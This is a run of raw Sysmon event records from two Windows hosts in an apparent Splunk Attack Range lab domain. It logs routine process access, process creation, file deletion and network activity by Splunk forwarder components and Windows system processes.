08:07:52.842{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F858-60EB-F67D-00000000CF01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F858-60EB-F67D-00000000CF01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.838{466BC892-F858-60EB-F67D-00000000CF01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.674{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFA7BB66E6085927114A29873E0B38C7,SHA256=90C381CEE72D18EB1440752827D558A88E5676B8BE86F397668A0CCA64B2C4B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.642{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C74EE54ED021B392FD8567427D606ABD,SHA256=760162B282AEE1EB409ED641440D28EE4C3F0ECA52F7D7D46855A283BC21658A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:51.322{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57464-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:52.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21B53E4A4584E8ABC2E63D569D52FB72,SHA256=2F7CDA5B46FDBEB10672AEB9E41A72738A66623149D4AFA904AC9BD7CD5BA8F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.589{466BC892-F858-60EB-F57D-00000000CF01}5720764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.320{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F858-60EB-F57D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.320{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.320{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.304{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.304{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.304{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F858-60EB-F57D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.304{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F858-60EB-F57D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.305{466BC892-F858-60EB-F57D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.858{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65024B8EB17F8F9B94DD00541D8AB452,SHA256=52747A34AC3B4FAEBA4F178BB224F34A73BA6A2F1708D2067251635C484AE270,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.742{466BC892-F859-60EB-F77D-00000000CF01}286010044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.674{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=367F6353ECEFAFBEA1D9A4ED89906BEC,SHA256=3FD08A804598E82BD637B9014819D1D713478065D8839B162E733437D32F9189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:53.345{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=773B0ED856491C781C842661B2CDC08D,SHA256=2FADD7CB185CDC33DA1234F368C19EA8A4CD36441247D9819BBA821F07072F7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F859-60EB-F77D-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F859-60EB-F77D-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F859-60EB-F77D-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.506{466BC892-F859-60EB-F77D-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.674{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4B5236C02A53CB5BAF1552D69D2A932,SHA256=103A8D1DCEF9C39D522AF402D65541D69BAA572C4497E8616220E0CD210587BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:54.361{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E80378A0C6B5D0AF257AB21D49B48C08,SHA256=5692FCA8783E0759B3728DD7120ACB9DF31A55989C040570A8A0CB15FC6263EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F85A-60EB-F87D-00000000CF01}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 